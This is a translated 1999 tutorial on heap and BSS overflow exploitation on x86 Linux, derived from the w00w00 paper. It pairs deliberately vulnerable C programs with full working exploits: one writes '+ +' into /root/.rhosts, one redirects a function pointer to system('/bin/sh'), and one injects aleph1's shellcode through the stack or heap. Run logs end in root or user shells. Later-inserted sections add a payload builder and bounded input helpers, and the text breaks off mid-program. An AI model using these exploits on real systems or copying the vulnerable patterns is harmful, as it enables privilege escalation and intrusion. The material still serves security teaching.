Text File | 2002-01-24 | 33.9 KB | 1,099 lines |

Heap/BSS Overflow Mechanism Analysis

warning3 <warning3@hotmail.com>
1999.12


[ Foreword: ]
[ This article is based mainly on the w00w00 paper: ]
[ w00w00 on Heap Overflows ]
[ By: Matt Conover & w00w00 Security Team ]
[-----------------------------------------------------------------------]
[ Copyright (C) January 1999, Matt Conover & w00w00 Security Development ]
[ I have also added some programs and ideas of my own. ]
[ Many thanks to Matt Conover for his warm help. ]
[ (Thank Matt for his great work and help) ]
[ The original text is available from: ]
[ http://www.w00w00.org/articles.html ]
[ This was written in a hurry, so mistakes are unavoidable; please send any ]
[ comments or suggestions to warning3@hotmail.com ]


Although heap/BSS-based overflows are quite common today, not much material
explains them. This article will help you understand what a heap overflow is,
present several common exploitation methods, and suggest some possible
solutions. To read it you need a basic knowledge of assembly, C, and stack
overflows.

1. Why are Heap/BSS overflows significant?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The stack overflow problem is widely known by now. More and more operating
system vendors have added non-executable stack patches, and individuals have
provided their own: the well-known non-executable stack kernel patch for Linux
by Solar Designer (a version for the 2.2.13 kernel is already out), and
compilers that defend against stack overflows, such as StackGuard by Crispin
Cowan et al. All of these reduce, to some degree, the security problems caused
by stack overflows, but none of them prevents Heap/BSS overflows. On most
operating systems the heap and BSS sections are both writable and executable,
which is what makes Heap/BSS exploitation possible.


Most heap-based overflows are independent of the operating system and
hardware architecture; this is covered further below.

2. Terminology
~~~~~~~~~~~~~~

An executable file (for example a file in the common ELF -- Executable and
Linking Format) usually contains several sections, such as: the PLT
(Procedure Linkage Table), the GOT (Global Offset Table), init (instructions
executed at initialization), fini (instructions executed when the program
terminates), and ctors and dtors (global constructors and destructors).

The HEAP is the memory region dynamically allocated by the application. "By
the application" deserves emphasis: in a good operating system most memory is
dynamically allocated at the kernel level, whereas the heap section is
allocated by the application itself. The data section holds initialized data
and is set up at compile time. The BSS section contains uninitialized data
and is allocated only when the program runs; until it is written to, it stays
all zero (at least from the application's point of view).

On most systems the heap grows upward (toward higher addresses). So when we
say "X is below Y", we mean "the address of X is lower than the address of
Y".


Note: "heap-based overflow" below covers overflows both of the HEAP section
and of the BSS section.
3. Heap/BSS overflow attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

In this part we introduce several different ways of exploiting Heap/BSS
overflows. Most of the examples target x86 Unix systems; with suitable changes
they can also be used on DOS and Windows. The original w00w00 article also
covers several DOS/Windows-specific methods, which are not reproduced here.

Note:

For simplicity, this article uses exact offsets. The offset must match the
real value for an exploit to work. Of course, as with ordinary stack exploits,
you can raise the odds of success by supplying the target address several
times over and by padding with NOP instructions.

The following example is for those who are not familiar with heap overflows;
I will explain it briefly:
-----------------------------------------------------------------------------
/* demonstrates a dynamic buffer overflow in the heap (initialized data) */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>

#define BUFSIZE 16
#define OVERSIZE 8 /* we will overwrite the first OVERSIZE bytes of buf2 */

int main()
{
   u_long diff;
   char *buf1 = (char *)malloc(BUFSIZE), *buf2 = (char *)malloc(BUFSIZE);

   diff = (u_long)buf2 - (u_long)buf1;
   printf("buf1 = %p, buf2 = %p, diff = 0x%lx (%ld)bytes\n", buf1, buf2,
          diff, diff);

   memset(buf2, 'A', BUFSIZE-1), buf2[BUFSIZE-1] = '\0'; /* fill buf2 with 'A' */

   printf("before overflow: buf2 = %s\n", buf2);
   memset(buf1, 'B', (u_int)(diff + OVERSIZE)); /* write diff+OVERSIZE 'B's starting at buf1 */
   printf("after overflow: buf2 = %s\n", buf2);

   return 0;
}
-----------------------------------------------------------------------------
When we run it, we get:
[warning3@testserver basic]$ ./heap1 8
buf1 = 0x8049858, buf2 = 0x8049870, diff = 0x18 (24)bytes
before overflow: buf2 = AAAAAAAAAAAAAAA
after overflow: buf2 = BBBBBBBBAAAAAAA

The first 8 bytes of buf2 have been overwritten, because the data written
into buf1 ran past its end and into buf2. Since buf2's data is still inside
valid heap memory, the program still exits normally. Note also that although
buf1 and buf2 were allocated one after the other, they are not adjacent: there
is an 8-byte gap between them (on glibc this is the allocator's per-chunk
header), and the size of this gap varies between systems.

             buf1               gap          buf2
before:  [xxxxxxxxxxxxxxxx][xxxxxxxx][AAAAAAAAAAAAAAA]
low address -----------------------------------> high address
after:   [BBBBBBBBBBBBBBBB][BBBBBBBB][BBBBBBBBAAAAAAA]

Note:

One possible way to block heap overflows is to put a "canary" value between
every variable in the heap section (as StackGuard does for the stack); if the
value changes during execution, an overflow is assumed to have happened.

To explain BSS overflows, let's look at this example:
-----------------------------------------------------------------------------
/* demonstrates a static buffer overflow in the BSS section (uninitialized data) */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include <sys/types.h>

#define ERROR -1
#define BUFSIZE 16

int main(int argc, char **argv)
{
   u_long diff;

   int oversize;
   static char buf1[BUFSIZE], buf2[BUFSIZE];

   if (argc <= 1)
   {
      fprintf(stderr, "Usage: %s <numbytes>\n", argv[0]);
      fprintf(stderr, "[Will overflow static buffer by <numbytes>]\n");

      exit(ERROR);
   }

   diff = (u_long)buf2 - (u_long)buf1;

   printf("buf1 = %p, buf2 = %p, diff = 0x%lx (%ld) bytes\n\n",
          buf1, buf2, diff, diff);

   memset(buf2, 'A', BUFSIZE - 1), memset(buf1, 'B', BUFSIZE - 1);
   buf1[BUFSIZE - 1] = '\0', buf2[BUFSIZE - 1] = '\0';

   printf("before overflow: buf1 = %s, buf2 = %s\n", buf1, buf2);

   oversize = diff + atoi(argv[1]); /* diff + <numbytes> 'B's, running from buf1 into buf2 */
   memset(buf1, 'B', oversize);

   buf1[BUFSIZE - 1] = '\0', buf2[BUFSIZE - 1] = '\0';
   printf("after overflow: buf1 = %s, buf2 = %s\n\n", buf1, buf2);

   return 0;
}
-----------------------------------------------------------------------------
When we run it, we get:
[warning3@testserver basic]$ ./heap2 8
buf1 = 0x8049874, buf2 = 0x8049884, diff = 0x10 (16) bytes

before overflow: buf1 = BBBBBBBBBBBBBBB, buf2 = AAAAAAAAAAAAAAA
after overflow: buf1 = BBBBBBBBBBBBBBB, buf2 = BBBBBBBBAAAAAAA

As with the heap overflow, the first 8 bytes of buf2 were overwritten. Notice
also that buf1 and buf2 are adjacent here, so there is no gap to guess.

             buf1               buf2
before:  [BBBBBBBBBBBBBBBB][AAAAAAAAAAAAAAA]
low address ----------------------> high address
after:   [BBBBBBBBBBBBBBBB][BBBBBBBBAAAAAAA]

From these two simple examples you should now understand the basic form of a
Heap/BSS overflow. We can use it to overwrite a file name, a password, a saved
uid, and so on...
The next example shows how a pointer gets overwritten:
-----------------------------------------------------------------------------
/* demonstrates a static pointer overflow in the BSS section (uninitialized data) */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include <sys/types.h>

#define BUFSIZE 16
#define ADDRLEN 4 /* length of a pointer (32-bit x86) */

int main()
{
   u_long diff;
   static char buf[BUFSIZE], *bufptr;

   bufptr = buf, diff = (u_long)&bufptr - (u_long)buf;

   printf("bufptr (%p) = %p, buf = %p, diff = 0x%lx (%ld) bytes\n",
          &bufptr, bufptr, buf, diff, diff);

   memset(buf, 'A', (u_int)(diff + ADDRLEN)); /* write diff+ADDRLEN 'A's starting at buf */

   printf("bufptr (%p) = %p, buf = %p, diff = 0x%lx (%ld) bytes\n",
          &bufptr, bufptr, buf, diff, diff);

   return 0;
}
-----------------------------------------------------------------------------
When we run it, we get:
[warning3@testserver basic]$ ./heap3
bufptr (0x8049640) = 0x8049630, buf = 0x8049630, diff = 0x10 (16) bytes
bufptr (0x8049640) = 0x41414141, buf = 0x8049630, diff = 0x10 (16) bytes

             buf                bufptr
before:  [xxxxxxxxxxxxxxxx][0x08049630]
low address ------------------> high address
after:   [AAAAAAAAAAAAAAAA][0x41414141]
                             [AAAA]

We can clearly see that bufptr now points somewhere else (0x41414141). How
can we use this? For example, we could overwrite a pointer to a temporary
file name so that it points to a different string (such as argv[1] or an
environment variable we supply) containing "/root/.rhosts" or
"/etc/passwd"....


To illustrate this, let's look at one more example. This program uses a
temporary file to store data entered by the user.
-----------------------------------------------------------------------------
/*
 * This is a typical vulnerable program. It stores the user's input in a
 * temporary file.
 *
 * Compile as: gcc -o vulprog1 vulprog1.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>

#define ERROR -1
#define BUFSIZE 16

/*
 * Run the exploit as root, or change the value of "vulfile" in the exploit.
 * Otherwise, even if the exploit succeeds, it will not have permission to
 * modify /root/.rhosts (the default example).
 */

int main(int argc, char **argv)
{
   FILE *tmpfd;
   static char buf[BUFSIZE], *tmpfile;

   if (argc <= 1)
   {
      fprintf(stderr, "Usage: %s <garbage>\n", argv[0]);
      exit(ERROR);
   }

   tmpfile = "/tmp/vulprog.tmp"; /* we ignore the symlink problem here for now :) */
   printf("before: tmpfile = %s\n", tmpfile);

   printf("Enter one line of data to put in %s: ", tmpfile);
   gets(buf); /* overflows buf */

   printf("\nafter: tmpfile = %s\n", tmpfile);

   tmpfd = fopen(tmpfile, "w");
   if (tmpfd == NULL)
   {
      fprintf(stderr, "error opening %s: %s\n", tmpfile,
              strerror(errno));

      exit(ERROR);
   }

   fputs(buf, tmpfd); /* write the data in buf to the temporary file */
   fclose(tmpfd);
   return 0;
}

-----------------------------------------------------------------------------
This kind of situation is easy to create when programming. Many people
believe that static arrays and static pointers are safer; after reading the
exploit below, I think you will no longer believe that. :-)
-----------------------------------------------------------------------------
/*
 * Copyright (C) January 1999, Matt Conover & WSD
 *
 * This program exploits vulprog1.c. It passes an argument to the vulnerable
 * program, which thinks it is storing the line of data we enter in a
 * temporary file. However, because of the static buffer overflow, we can
 * modify the pointer to the temporary file so that it points to argv[1] (to
 * which we pass "/root/.rhosts"). The program then stores the input we
 * supplied in "/root/.rhosts". So the string we use to overflow the buffer
 * has this format:
 * [+ + # ][(address of tmpfile) - (address of buf) 'A's][address of argv[1]]
 *
 * The '#' after "+ +" keeps our overflow data from causing trouble. Without
 * the '#' (comment character), programs that use .rhosts would misparse our
 * overflow data.
 *
 * Compile as: gcc -o exploit1 exploit1.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>

#define ERROR -1
#define BUFSIZE 256

#define DIFF 16 /* distance between buf and tmpfile in vulprog */

#define VULPROG "./vulprog1"
#define VULFILE "/root/.rhosts" /* the contents of buf will be stored in this file */

/* get the current stack pointer (esp); used to calculate the address of argv[1] */
u_long getesp()
{
   __asm__("movl %esp,%eax"); /* equiv. of 'return esp;' in C */
}

int main(int argc, char **argv)
{
   u_long addr;

   register int i;
   int mainbufsize;

   char *mainbuf, buf[DIFF+6+1] = "+ +\t# ";

   /* ------------------------------------------------------ */
   if (argc <= 1)
   {
      fprintf(stderr, "Usage: %s <offset> [try 310-330]\n", argv[0]);
      exit(ERROR);
   }
   /* ------------------------------------------------------ */

   memset(buf, 0, sizeof(buf)), strcpy(buf, "+ +\t# "); /* put the attack string in buf */

   memset(buf + strlen(buf), 'A', DIFF); /* fill the rest of buf with 'A's */
   addr = getesp() + atoi(argv[1]); /* calculate the address of argv[1] */

   /* reverse the byte order (on a little endian system) and store at buf+DIFF */
   for (i = 0; i < sizeof(u_long); i++)
      buf[DIFF + i] = ((u_long)addr >> (i * 8) & 255);

   /* calculate the length of mainbuf */
   mainbufsize = strlen(buf) + strlen(VULPROG) + strlen(VULFILE) + 13;

   mainbuf = (char *)malloc(mainbufsize);
   memset(mainbuf, 0, mainbufsize); /* not sizeof(mainbuf): that is only the size of a pointer */

   snprintf(mainbuf, mainbufsize - 1, "echo '%s' | %s %s\n",
            buf, VULPROG, VULFILE);

   printf("Overflowing tmpaddr to point to %p, check %s after.\n\n",
          addr, VULFILE);

   system(mainbuf);
   return 0;
}

-----------------------------------------------------------------------------

[root@testserver vulpkg1]# ./exploit1 349
Overflowing tmpaddr to point to 0xbffffe6d, check /root/.rhosts after.

before: tmpfile = /tmp/vulprog.tmp
Enter one line of data to put in /tmp/vulprog.tmp:
after: tmpfile = /vulprog1

tmpfile now points into argv[0] ("./vulprog1"), so we add 10 bytes (the
length of argv[0]):

[root@testserver vulpkg1]# ./exploit1 359
Overflowing tmpaddr to point to 0xbffffe77, check /root/.rhosts after.

before: tmpfile = /tmp/vulprog.tmp
Enter one line of data to put in /tmp/vulprog.tmp:
after: tmpfile = /root/.rhosts
[root@testserver vulpkg1]# cat /root/.rhosts
+ + # AAAAAAAAAAw?┐AA
(the four bytes after the 'A's are the raw little endian address 0xbffffe77)

             buf                  tmpfile
after:   [+ +\t# AAAAAAAAAA][0xbffffe77]

We have successfully added "+ +" to /root/.rhosts! The exploit overflowed the
static buffer that vulprog fills from gets() and overwrote tmpfile with the
guessed address of argv[1]. We could put any number of 'A's in mainbuf until
we find how many it takes to reach tmpfile's address. If you have the source
of the vulnerable program, you can add a printf() that shows the distance
between the overflowed data and the target data (for example:
'printf("%p - %p = 0x%lx bytes\n", buf2, buf1, (u_long)diff)').

This offset usually changes when the program is recompiled, but it is easy to
recalculate, guess, or even brute-force.

Note:

We need a valid address (the address of argv[1]), and we have to reverse its
byte order (on little endian systems). Little endian systems store the low
byte first (x86 is little endian), so 0x12345678 is stored in memory in the
order 0x78563412. If we were doing this on a big endian system (such as
SPARC), the reversal would not be needed.

So far, none of these examples required an executable heap! They are
independent of the system and hardware architecture (except for the byte
ordering), which is very useful when exploiting heap overflows.
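The address-encoding step and the payload layout used by exploit1 ([prefix]['A' filler][pointer]), generalized to either byte order. This is an added example, not part of the original article or of the exploit: `addr_byte`, `put_addr32`, `as_target_sees_it` and `build_pointer_payload` are names chosen here, and the diff of 16 and the address 0xbffffe77 in the self-check are the values from the run above. It detects the host's byte order at run time rather than assuming x86, and shows what the target program reads if the bytes are stored in the wrong order.

```c
/* Added example (not from the original article or exploit1): build the
 * "[prefix][filler][pointer]" overwrite payload for either byte order.
 * All function names here are chosen for this demo. */
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stddef.h>

/* Host byte order at run time: the first byte in memory of the 32-bit value 1
 * is 0x01 on little endian x86 and 0x00 on big endian machines such as SPARC. */
int host_is_little_endian(void)
{
    uint32_t one = 1;
    unsigned char first;
    memcpy(&first, &one, 1);
    return first == 1;
}

/* Byte idx (0 = first in memory) of addr when stored in the given order. */
unsigned char addr_byte(uint32_t addr, int idx, int little)
{
    int shift = little ? idx * 8 : (3 - idx) * 8;
    return (unsigned char)((addr >> shift) & 0xff);
}

/* Store addr into out[0..3]; little=1 gives the 0x78 0x56 0x34 0x12 layout
 * described in the note for 0x12345678. */
void put_addr32(unsigned char out[4], uint32_t addr, int little)
{
    int i;
    for (i = 0; i < 4; i++)
        out[i] = addr_byte(addr, i, little);
}

/* Encode addr in the given order, then read it back the way the target
 * dereferences the overwritten pointer: as a native uint32_t. Returns addr when
 * the order matches the host and the byte-swapped value when it does not, the
 * classic symptom of forgetting the reversal. */
uint32_t as_target_sees_it(uint32_t addr, int little)
{
    unsigned char raw[4];
    uint32_t v;
    put_addr32(raw, addr, little);
    memcpy(&v, raw, 4);
    return v;
}

/* exploit1's layout: prefix, then 'A' filler up to diff bytes from the start of
 * the target buffer, then the 4-byte pointer. Returns the total length, or 0
 * if the prefix is longer than diff or the result does not fit in outsz. */
size_t build_pointer_payload(unsigned char *out, size_t outsz,
                             const char *prefix, size_t diff,
                             uint32_t addr, int little)
{
    size_t plen = strlen(prefix);
    if (plen > diff || diff + 4 > outsz)
        return 0;
    memcpy(out, prefix, plen);
    memset(out + plen, 'A', diff - plen);
    put_addr32(out + diff, addr, little);
    return diff + 4;
}

/* Self-check with the values from the run above (diff 16, argv[1] at
 * 0xbffffe77): returns the payload length (20) if the prefix/filler are right
 * and the pointer slot decodes back to the address, -1 otherwise. */
int payload_demo(void)
{
    unsigned char p[64];
    uint32_t v;
    size_t n = build_pointer_payload(p, sizeof p, "+ +\t# ", 16,
                                     0xbffffe77u, host_is_little_endian());
    if (n != 20 || memcmp(p, "+ +\t# AAAAAAAAAA", 16) != 0)
        return -1;
    memcpy(&v, p + 16, 4);
    return v == 0xbffffe77u ? (int)n : -1;
}

int main(void)
{
    unsigned char p[64];
    size_t i, n = build_pointer_payload(p, sizeof p, "+ +\t# ", 16,
                                        0xbffffe77u, host_is_little_endian());
    printf("host is %s endian; %lu-byte payload:\n",
           host_is_little_endian() ? "little" : "big", (unsigned long)n);
    for (i = 0; i < n; i++)
        printf("%02x ", p[i]);
    printf("\n");
    return 0;
}
```

The shift loop in exploit1 is the little=1 case of `addr_byte`; the only change needed for a big endian target is little=0, which is why the article can call these overflows architecture-independent apart from byte order.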

Now that we know how to overwrite a pointer, let's see how to modify a
function pointer. Unlike the previous examples, attacks that redirect a
function pointer to shellcode require an executable heap or stack; the
system() method described below does not.

A function pointer (for example "int (*funcptr)(char *str)") lets the
programmer change dynamically which function gets called. We can overwrite
the function pointer's value so that when it is invoked, it calls a function
(code) of our choosing. There are several options for doing this.

First, we can use our own shellcode, in one of two ways:

1. the argv[] method: store the shellcode in a program argument (this
   requires an executable stack)
2. the heap offset method: store the shellcode in the region between the top
   of the heap and the pointer being overwritten (this requires an executable
   heap)

Note:

The heap is far more likely to be executable than the stack, so the heap
method is probably the more commonly usable of the two.

Another method is simply to guess the address of a function such as
system(). If we know the address of system() in the exploit program, then the
address of system() in the target program should be close to it, assuming both
were compiled under the same conditions. The advantage of this method is that
it needs no executable heap. (Yet another method uses the PLT (Procedure
Linkage Table); it is not described here; interested readers can look at
stranJer's exploit for bypassing the non-executable stack.)


The advantage of the second (system()) method is simplicity: we can quickly
guess the address of system() in the vulnerable program from its address in
the exploit, and it is the same on a remote system (if the version, operating
system and architecture are identical). The advantage of the first
(shellcode) method is that our own shellcode can do anything, and we do not
have to worry about the function pointer's signature: whether it is char
(*funcptr)(int a) or void (*funcptr)(), it works either way, whereas the
system() method does have to care what argument gets passed. Its disadvantage
is that it needs an executable heap or stack.
Now let's look at another vulnerable program:
-----------------------------------------------------------------------------
/*
 * Just the vulnerable program we will exploit.
 * Compile as: gcc -o vulprog vulprog.c (or change exploit macros)
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define ERROR -1
#define BUFSIZE 64

int goodfunc(const char *str); /* the function funcptr normally points to */

int main(int argc, char **argv)
{
   static char buf[BUFSIZE];
   static int (*funcptr)(const char *str); /* this is the function pointer we will overwrite */

   if (argc <= 2)
   {
      fprintf(stderr, "Usage: %s <buf> <goodfunc arg>\n", argv[0]);
      exit(ERROR);
   }

   printf("(for 1st exploit) system() = %p\n", system);
   printf("(for 2nd exploit, stack method) argv[2] = %p\n", argv[2]);
   printf("(for 2nd exploit, heap offset method) buf = %p\n\n", buf);

   funcptr = (int (*)(const char *str))goodfunc;
   printf("before overflow: funcptr points to %p\n", funcptr);

   memset(buf, 0, sizeof(buf));
   /* the overflow can happen here; this is a very common misuse of strncpy:
      the bound is taken from the source, not from the destination */
   strncpy(buf, argv[1], strlen(argv[1]));
   printf("after overflow: funcptr points to %p\n", funcptr);

   (void)(*funcptr)(argv[2]); /* normally calls goodfunc with argv[2] */
   return 0;
}

/* ---------------------------------------------- */

/* This is what funcptr would point to if we didn't overflow it */
int goodfunc(const char *str)
{
   printf("\nHi, I'm a good function. I was passed: %s\n", str);
   return 0;
}
-----------------------------------------------------------------------------
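The two unsafe input calls on this page, gets(buf) in vulprog1 and strncpy(buf, argv[1], strlen(argv[1])) in vulprog, beside bounded replacements. This is an added example and not the original article's code: `copy_bounded`, `read_line_bounded` and the demo helpers are names introduced here, and the inputs in main() are constructed. The struct mirrors vulprog's layout (a 64-byte static buffer followed by a function pointer) so the check can confirm that the pointer is never reached no matter how long the argument is; the line reader also drains an over-long line instead of leaving its tail to be read as the next input.

```c
/* Added example (not from the original article): bounded replacements for
 * the gets() and strncpy(dst, src, strlen(src)) patterns used by vulprog1
 * and vulprog. Helper names and sample inputs are chosen for this demo. */
#include <stdio.h>
#include <string.h>

#define BUFSIZE 64

/* Replacement for strncpy(dst, src, strlen(src)): the bound comes from the
 * destination. Copies at most dstsz-1 bytes, always NUL-terminates, returns 0
 * on success or -1 if src had to be truncated (callers treat that as an error). */
int copy_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (dstsz == 0)
        return -1;
    if (n >= dstsz) {
        memcpy(dst, src, dstsz - 1);
        dst[dstsz - 1] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* Replacement for gets(dst): reads one line into a dstsz-byte buffer and strips
 * the newline. If the line did not fit, the rest of it is drained so it cannot
 * be mistaken for the next line, and -1 is returned. */
int read_line_bounded(char *dst, size_t dstsz, FILE *fp)
{
    size_t len, dropped = 0;
    int c;

    if (dstsz == 0 || fgets(dst, (int)dstsz, fp) == NULL)
        return -1;
    len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[len - 1] = '\0';
        return 0;
    }
    /* no newline: either the line ended at EOF (fine) or it was too long */
    while ((c = fgetc(fp)) != EOF && c != '\n')
        dropped++;
    return dropped ? -1 : 0;
}

/* vulprog's layout: a static buffer immediately followed by a function pointer. */
static struct {
    char buf[BUFSIZE];
    int (*funcptr)(const char *);
} target;

static int goodfunc(const char *s) { return (int)strlen(s); }

/* Copy src into target.buf with copy_bounded; 1 if funcptr is still goodfunc. */
int funcptr_survives(const char *src)
{
    target.funcptr = goodfunc;
    (void)copy_bounded(target.buf, sizeof target.buf, src);
    return target.funcptr == goodfunc;
}

/* copy_bounded's result for src into a bufsz-byte buffer (bufsz <= 256). */
int copy_demo(const char *src, size_t bufsz)
{
    char tmp[256];
    if (bufsz > sizeof tmp)
        return -2;
    return copy_bounded(tmp, bufsz, src);
}

/* Feed a constructed input string through read_line_bounded with a bufsz-byte
 * buffer; returns the length of the line read, or -1 if it did not fit.
 * tmpfile() stands in for stdin so the demo runs without a terminal. */
int read_demo(const char *constructed_input, size_t bufsz)
{
    char tmp[256];
    FILE *fp;
    int r;
    if (bufsz > sizeof tmp || (fp = tmpfile()) == NULL)
        return -2;
    fputs(constructed_input, fp);
    rewind(fp);
    r = read_line_bounded(tmp, bufsz, fp);
    fclose(fp);
    return r == 0 ? (int)strlen(tmp) : r;
}

int main(void)
{
    /* constructed 80-byte argument, longer than target.buf */
    static const char longarg[] =
        "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
    printf("funcptr intact after 80-byte argument: %d\n", funcptr_survives(longarg));
    printf("over-long line through the gets() replacement: %d\n",
           read_demo("0123456789abcdefgh\n", 16));
    return 0;
}
```

Note what the bounded versions give up: truncation is reported, not hidden. Silently truncating a file name or a password is its own class of bug, so the caller should fail the operation when -1 comes back rather than carry on with a shortened value.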
Let's look at the first exploit, which uses the system() method:
-----------------------------------------------------------------------------
/*
 * Copyright (C) January 1999, Matt Conover & WSD
 *
 * Demonstrates overwriting a static function pointer in the bss
 * (uninitialized data) section.
 *
 * Try an offset (argv[1]) in the range of 0-20 (10-16 is best)
 * To compile use: gcc -o exploit1 exploit1.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>

/* assumed distance between buf and funcptr (in the BSS this should equal the size of buf) */
#define BUFSIZE 64

#define VULPROG "./vulprog" /* where the vulnerable program is */
#define CMD "/bin/sh" /* the command to run if the exploit succeeds */

#define ERROR -1

int main(int argc, char **argv)
{
   register int i;
   u_long sysaddr;
   static char buf[BUFSIZE + sizeof(u_long) + 1] = {0};

   if (argc <= 1)
   {
      fprintf(stderr, "Usage: %s <offset>\n", argv[0]);
      fprintf(stderr, "[offset = estimated system() offset]\n\n");

      exit(ERROR);
   }

   sysaddr = (u_long)&system - atoi(argv[1]); /* calculate the address of system() */
   printf("trying system() at 0x%lx\n", sysaddr);

   memset(buf, 'A', BUFSIZE);

   /* on a little endian system the bytes must be stored in reverse order */
   for (i = 0; i < sizeof(sysaddr); i++)
      buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255;

   execl(VULPROG, VULPROG, buf, CMD, NULL);
   return 0;
}
-----------------------------------------------------------------------------
When we run it, we get:

[warning3@testserver vulpkg2]$ ./exploit2 12
Trying system() at 0x80483fc
system()'s address = 0x80483fc
before overflow: funcptr points to 0x80485fc
after overflow: funcptr points to 0x80483fc
bash$
In the next example we use the stack and heap methods:
-----------------------------------------------------------------------------
/*
 * Copyright (C) January 1999, Matt Conover & WSD
 *
 * This demonstrates overwriting a static function pointer so that it points
 * to shellcode we supply. This method requires an executable stack or heap.
 *
 * The program takes two arguments: offset and heap/stack. For the stack
 * method, offset is the distance from the top of the stack to (the
 * vulnerable program's) argv[2]. For the heap method, offset is the distance
 * from the top of the heap to the overflowed (or specified) buffer.
 *
 * Try values somewhere between 325-345 for argv[] method, and 420-450
 * for heap.
 *
 * To compile use: gcc -o exploit2 exploit2.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>

#define ERROR -1
#define BUFSIZE 64 /* estimated diff between buf/funcptr */

#define VULPROG "./vulprog" /* where the vulprog is */

char shellcode[] = /* just aleph1's old shellcode (linux x86) */
   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0"
   "\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
   "\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

u_long getesp()
{
   __asm__("movl %esp,%eax"); /* get the current top of the stack */
}

int main(int argc, char **argv)
{
   register int i;
   u_long sysaddr;
   char buf[BUFSIZE + sizeof(u_long) + 1];

   if (argc <= 2)
   {
      fprintf(stderr, "Usage: %s <offset> <heap | stack>\n", argv[0]);
      exit(ERROR);
   }

   if (strncmp(argv[2], "stack", 5) == 0) /* stack method */
   {
      printf("Using stack for shellcode (requires exec. stack)\n");

      sysaddr = getesp() + atoi(argv[1]); /* calculate the address of argv[2] */
      printf("Using 0x%lx as our argv[1] address\n\n", sysaddr);

      memset(buf, 'A', BUFSIZE + sizeof(u_long));
   }

   else /* heap method */
   {
      printf("Using heap buffer for shellcode "
             "(requires exec. heap)\n");

      /* calculate the target buffer's address (sbrk(0) gives the top of the heap) */
      sysaddr = (u_long)sbrk(0) - atoi(argv[1]);
      printf("Using 0x%lx as our buffer's address\n\n", sysaddr);

      /*
       * Check whether the distance between buf and funcptr is too small to
       * hold our shellcode. If it is, an alternative layout is to fill the
       * buffer with copies of the address and put the shellcode after funcptr:
       *        buf                  funcptr    sysaddr
       *  [sysaddr|sysaddr|...][sysaddr][shellcode]
       */
      if (BUFSIZE + 4 + 1 < strlen(shellcode))
      {
         fprintf(stderr, "error: buffer is too small for shellcode "
                 "(min. = %d bytes)\n", (int)strlen(shellcode));

         exit(ERROR);
      }

      strcpy(buf, shellcode);
      memset(buf + strlen(shellcode), 'A',
             BUFSIZE - strlen(shellcode) + sizeof(u_long));
   }

   buf[BUFSIZE + sizeof(u_long)] = '\0';

   /* reverse byte order (on a little endian system) (ntohl equiv) */
   for (i = 0; i < sizeof(sysaddr); i++)
      buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255;

   execl(VULPROG, VULPROG, buf, shellcode, NULL);
   return 0;
}
-----------------------------------------------------------------------------
First the stack method:
[warning3@testserver vulpkg3]$ ./exploit3 319 stack
Using stack for shellcode (requires exec. stack)
Using 0xbffffdf7 as our argv[1] address

argv[1] = 0xbffffdf7
buf = 0x8049820

before: funcptr = 0x8048500
after: funcptr = 0xbffffdf7

bash$

             buf                funcptr          stack
before:  [xxxxxx...xxxxxxx][0x08048500]
low address ------------------> high address
after:   [AAAAAA...AAAAAAA][0xbffffdf7]      [shellcode]
                                |                ^
                                |________________|

Now the heap method:
[warning3@testserver vulpkg3]$ ./exploit3 836 heap
Using heap buffer for shellcode (requires exec. heap)
Using 0x8049820 as our buffer's address

argv[1] = 0xbffffdf7
buf = 0x8049820

before: funcptr = 0x8048500
after: funcptr = 0x8049820

bash$

             buf                funcptr
before:  [xxxxxxxxxxxxxxxx][0x08048500]
low address ------------------> high address
after:   [shellcodeAAA...A][0x8049820]
          ^                     |
          |_____________________|


The examples above show that the same problem can be attacked in several
different ways. Here we introduce one more kind of attack, using the setjmp
and longjmp functions. These two functions are usually used in low-level
routines to handle errors and interrupts. setjmp(jmpbuf) saves the current
stack frame (the registers that define it) in jmpbuf; longjmp(jmpbuf, val)
restores that frame from jmpbuf, after which execution continues at the
statement following the setjmp() call, with val as setjmp()'s return value.
On x86 Linux (glibc) jmpbuf holds the registers bx, si, di, bp, sp and pc. If
we can overwrite jmpbuf before longjmp runs, we can rewrite the saved pc, so
when longjmp restores the saved frame the program jumps to a place of our
choosing, which can be on the stack or on the heap. We now explain this
concretely on an x86 system.

(The code below was compiled on Red Hat 6.0 with kernel 2.2.5. For other
systems, consult setjmp.h and adjust the code accordingly. Note also that
current glibc versions mangle the saved sp, bp and pc in jmp_buf with a
per-process secret (PTR_MANGLE), so the raw overwrite shown here no longer
works as-is on modern systems.)

First, a vulnerable program:
-----------------------------------------------------------------------------
/*
 * This is just a basic vulnerable program to demonstrate
 * how to overwrite/modify jmp_buf's to modify the course of
 * execution.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <setjmp.h>
#include <sys/types.h>

#define ERROR -1
#define BUFSIZE 16

static char buf[BUFSIZE];
